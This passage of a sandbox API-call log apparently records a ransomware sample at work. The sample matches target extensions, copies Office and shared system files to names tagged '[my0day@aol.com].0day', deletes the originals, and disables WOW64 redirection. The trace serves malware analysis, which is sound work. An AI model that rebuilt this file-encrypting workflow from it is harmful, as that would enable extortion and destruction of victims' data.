lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x4c438, lpOverlapped=0x0) returned 1 [0274.879] WriteFile (in: hFile=0x300, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x4c440, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0x4c440, lpOverlapped=0x0) returned 1 [0274.885] ReadFile (in: hFile=0x394, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.885] WriteFile (in: hFile=0x300, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.885] SetEndOfFile (hFile=0x300) returned 1 [0274.885] CloseHandle (hObject=0x300) returned 1 [0274.885] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.885] SetEndOfFile (hFile=0x394) returned 1 [0274.897] CloseHandle (hObject=0x394) returned 1 [0274.897] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.914] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml")) returned 1 [0274.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0274.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0274.949] lstrlenW (lpString=".doc") returned 4 [0274.949] lstrcmpiW (lpString1=".doc", lpString2=".MML") returned -1 [0274.949] lstrlenW (lpString=".docx") returned 5 [0274.949] lstrcmpiW (lpString1=".docx", lpString2="0.MML") returned -1 [0274.949] lstrlenW (lpString=".pdf") returned 4 [0274.949] lstrcmpiW (lpString1=".pdf", lpString2=".MML") returned 1 [0274.949] lstrlenW (lpString=".xls") returned 4 [0274.949] lstrcmpiW (lpString1=".xls", lpString2=".MML") returned 1 [0274.949] lstrlenW (lpString=".xlsx") returned 5 [0274.949] lstrcmpiW (lpString1=".xlsx", lpString2="0.MML") returned -1 [0274.949] lstrlenW (lpString=".ppt") returned 4 [0274.949] lstrcmpiW (lpString1=".ppt", lpString2=".MML") returned 1 [0274.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0274.949] lstrlenW (lpString=".zip") returned 4 [0274.949] lstrcmpiW (lpString1=".zip", lpString2=".MML") returned 1 [0274.949] lstrlenW (lpString=".rar") returned 4 [0274.949] lstrcmpiW (lpString1=".rar", lpString2=".MML") returned 1 [0274.949] lstrlenW (lpString=".bz2") returned 4 [0274.949] lstrcmpiW (lpString1=".bz2", lpString2=".MML") returned -1 [0274.949] lstrlenW (lpString=".7z") returned 3 [0274.949] lstrcmpiW (lpString1=".7z", lpString2="MML") returned -1 [0274.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0274.950] lstrlenW (lpString=".dbf") returned 4 [0274.950] lstrcmpiW (lpString1=".dbf", lpString2=".MML") returned -1 [0274.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0274.950] lstrlenW (lpString=".1cd") returned 4 [0274.950] lstrcmpiW (lpString1=".1cd", lpString2=".MML") returned -1 [0274.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0274.950] lstrlenW (lpString=".jpg") returned 4 [0274.950] lstrcmpiW (lpString1=".jpg", lpString2=".MML") returned -1 [0274.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0274.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0274.950] lstrlenW (lpString=".doc") returned 4 [0274.950] lstrcmpiW (lpString1=".doc", lpString2=".MML") returned -1 [0274.950] lstrlenW (lpString=".docx") returned 5 [0274.950] lstrcmpiW (lpString1=".docx", lpString2="0.MML") returned -1 [0274.950] lstrlenW (lpString=".pdf") returned 4 [0274.950] lstrcmpiW (lpString1=".pdf", lpString2=".MML") returned 1 [0274.950] lstrlenW (lpString=".xls") returned 4 [0274.950] lstrcmpiW (lpString1=".xls", lpString2=".MML") returned 1 [0274.950] lstrlenW (lpString=".xlsx") returned 5 [0274.950] lstrcmpiW (lpString1=".xlsx", lpString2="0.MML") returned -1 [0274.950] lstrlenW (lpString=".ppt") returned 4 [0274.950] lstrcmpiW (lpString1=".ppt", lpString2=".MML") returned 1 [0274.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0274.950] lstrlenW (lpString=".zip") returned 4 [0274.950] lstrcmpiW (lpString1=".zip", lpString2=".MML") returned 1 [0274.950] lstrlenW (lpString=".rar") returned 4 [0274.950] lstrcmpiW (lpString1=".rar", lpString2=".MML") returned 1 [0274.950] lstrlenW (lpString=".bz2") returned 4 [0274.950] lstrcmpiW (lpString1=".bz2", lpString2=".MML") returned -1 [0274.950] lstrlenW (lpString=".7z") returned 3 [0274.950] lstrcmpiW (lpString1=".7z", lpString2="MML") returned -1 [0274.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0274.950] lstrlenW (lpString=".dbf") returned 4 [0274.950] lstrcmpiW (lpString1=".dbf", lpString2=".MML") returned -1 [0274.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0274.950] lstrlenW (lpString=".1cd") returned 4 [0274.951] lstrcmpiW (lpString1=".1cd", lpString2=".MML") returned -1 [0274.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0274.951] lstrlenW (lpString=".jpg") returned 4 [0274.951] lstrcmpiW (lpString1=".jpg", lpString2=".MML") returned -1 [0274.951] lstrcmpiW (lpString1=".ACC", lpString2=".0day") returned 1 [0274.951] lstrlenW (lpString="ACCESS12.ACC") returned 12 [0274.951] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0274.952] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=495616) returned 1 [0274.952] CloseHandle (hObject=0x3a8) returned 1 [0274.952] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc")) returned 0x20 [0274.953] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0274.953] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.953] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCESS12.ACC.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\access12.acc.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0274.960] GetLastError () returned 0x0 [0274.960] ReadFile (in: hFile=0x3a8, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x79000, lpOverlapped=0x0) returned 1 [0275.003] WriteFile (in: hFile=0x318, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x79010, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0x79010, lpOverlapped=0x0) returned 1 [0275.089] ReadFile (in: hFile=0x3a8, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0275.089] WriteFile (in: hFile=0x318, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xec, lpOverlapped=0x0) returned 1 [0275.089] SetEndOfFile (hFile=0x318) Thread: id = 64 os_tid = 0x6a0 [0265.355] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10000) returned 0x3540088 [0265.355] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10000) returned 0x3550090 [0265.355] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x5335a8 [0265.355] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x6) returned 0x521ad0 [0265.355] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x533590 [0265.355] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x100000) returned 0x3df0020 [0265.355] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x533260 [0265.355] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x533260, Size=0x20) returned 0x587b20 [0265.355] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x533260 [0265.356] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x533260, Size=0x20) returned 0x587b48 [0265.356] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74da0000 [0265.356] GetProcAddress (hModule=0x74da0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74dcd650 [0265.356] Wow64DisableWow64FsRedirection (in: OldValue=0x380ff58 | out: OldValue=0x380ff58*=0x0) returned 1 [0265.356] lstrlenW (lpString="kernel32.dll") returned 12 [0265.356] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x587b20 | out: hHeap=0x4a0000) returned 1 [0265.356] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0265.356] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x587b48 | out: hHeap=0x4a0000) returned 1 [0265.356] Sleep (dwMilliseconds=0x64) [0265.563] Sleep (dwMilliseconds=0x64) [0265.774] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0265.774] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0265.774] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0265.840] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=4096) returned 1 [0265.840] CloseHandle (hObject=0x304) returned 1 [0265.840] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui")) returned 0x20 [0265.840] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0265.840] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.840] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0265.840] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0265.840] lstrlenW (lpString=".doc") returned 4 [0265.840] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0265.840] lstrlenW (lpString=".docx") returned 5 [0265.840] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0265.840] lstrlenW (lpString=".pdf") returned 4 [0265.840] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0265.841] lstrlenW (lpString=".xls") returned 4 [0265.841] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0265.841] lstrlenW (lpString=".xlsx") returned 5 [0265.841] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0265.841] lstrlenW (lpString=".ppt") returned 4 [0265.841] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0265.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0265.841] lstrlenW (lpString=".zip") returned 4 [0265.841] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0265.841] lstrlenW (lpString=".rar") returned 4 [0265.841] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0265.841] lstrlenW (lpString=".bz2") returned 4 [0265.841] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0265.841] lstrlenW (lpString=".7z") returned 3 [0265.841] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0265.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0265.841] lstrlenW (lpString=".dbf") returned 4 [0265.841] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0265.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0265.841] lstrlenW (lpString=".1cd") returned 4 [0265.841] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0265.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0265.841] lstrlenW (lpString=".jpg") returned 4 [0265.841] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0265.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0265.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0265.841] lstrlenW (lpString=".doc") returned 4 [0265.841] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0265.841] lstrlenW (lpString=".docx") returned 5 [0265.841] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0265.841] lstrlenW (lpString=".pdf") returned 4 [0265.841] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0265.841] lstrlenW (lpString=".xls") returned 4 [0265.841] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0265.841] lstrlenW (lpString=".xlsx") returned 5 [0265.841] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0265.842] lstrlenW (lpString=".ppt") returned 4 [0265.842] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0265.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0265.842] lstrlenW (lpString=".zip") returned 4 [0265.842] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0265.842] lstrlenW (lpString=".rar") returned 4 [0265.842] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0265.842] lstrlenW (lpString=".bz2") returned 4 [0265.842] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0265.842] lstrlenW (lpString=".7z") returned 3 [0265.842] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0265.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0265.842] lstrlenW (lpString=".dbf") returned 4 [0265.842] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0265.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0265.842] lstrlenW (lpString=".1cd") returned 4 [0265.842] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0265.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0265.842] lstrlenW (lpString=".jpg") returned 4 [0265.842] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0265.842] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0265.842] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0265.842] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0265.940] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=4096) returned 1 [0265.940] CloseHandle (hObject=0x308) returned 1 [0265.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui")) returned 0x20 [0265.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0265.940] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0265.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0265.940] lstrlenW (lpString=".doc") returned 4 [0265.940] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0265.940] lstrlenW (lpString=".docx") returned 5 [0265.940] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0265.940] lstrlenW (lpString=".pdf") returned 4 [0265.940] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0265.940] lstrlenW (lpString=".xls") returned 4 [0265.940] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0265.940] lstrlenW (lpString=".xlsx") returned 5 [0265.941] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0265.941] lstrlenW (lpString=".ppt") returned 4 [0265.941] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0265.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0265.941] lstrlenW (lpString=".zip") returned 4 [0265.941] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0265.941] lstrlenW (lpString=".rar") returned 4 [0265.941] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0265.941] lstrlenW (lpString=".bz2") returned 4 [0265.941] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0265.941] lstrlenW (lpString=".7z") returned 3 [0265.941] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0265.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0265.941] lstrlenW (lpString=".dbf") returned 4 [0265.941] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0265.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0265.941] lstrlenW (lpString=".1cd") returned 4 [0265.943] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0265.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0265.943] lstrlenW (lpString=".jpg") returned 4 [0265.943] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0265.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0265.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0265.943] lstrlenW (lpString=".doc") returned 4 [0265.943] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0265.943] lstrlenW (lpString=".docx") returned 5 [0265.943] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0265.943] lstrlenW (lpString=".pdf") returned 4 [0265.944] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0265.944] lstrlenW (lpString=".xls") returned 4 [0265.944] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0265.944] lstrlenW (lpString=".xlsx") returned 5 [0265.944] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0265.944] lstrlenW (lpString=".ppt") returned 4 [0265.944] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0265.944] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0265.944] lstrlenW (lpString=".zip") returned 4 [0265.944] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0265.944] lstrlenW (lpString=".rar") returned 4 [0265.944] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0265.944] lstrlenW (lpString=".bz2") returned 4 [0265.944] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0265.944] lstrlenW (lpString=".7z") returned 3 [0265.944] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0265.944] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0265.944] lstrlenW (lpString=".dbf") returned 4 [0265.944] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0265.944] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0265.944] lstrlenW (lpString=".1cd") returned 4 [0265.944] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0265.944] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui") returned 72 [0265.944] lstrlenW (lpString=".jpg") returned 4 [0265.944] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0265.944] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0265.944] lstrlenW (lpString="InputPersonalization.exe.mui") returned 28 [0265.944] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0266.166] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=2560) returned 1 [0266.166] CloseHandle (hObject=0x300) returned 1 [0266.166] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui")) returned 0x20 [0266.166] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.166] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.166] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0266.166] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0266.166] lstrlenW (lpString=".doc") returned 4 [0266.166] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0266.166] lstrlenW (lpString=".docx") returned 5 [0266.166] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0266.166] lstrlenW (lpString=".pdf") returned 4 [0266.166] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0266.166] lstrlenW (lpString=".xls") returned 4 [0266.166] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0266.166] lstrlenW (lpString=".xlsx") returned 5 [0266.166] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0266.166] lstrlenW (lpString=".ppt") returned 4 [0266.166] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0266.166] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0266.166] lstrlenW (lpString=".zip") returned 4 [0266.166] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0266.166] lstrlenW (lpString=".rar") returned 4 [0266.166] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0266.166] lstrlenW (lpString=".bz2") returned 4 [0266.166] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0266.166] lstrlenW (lpString=".7z") returned 3 [0266.166] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0266.166] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 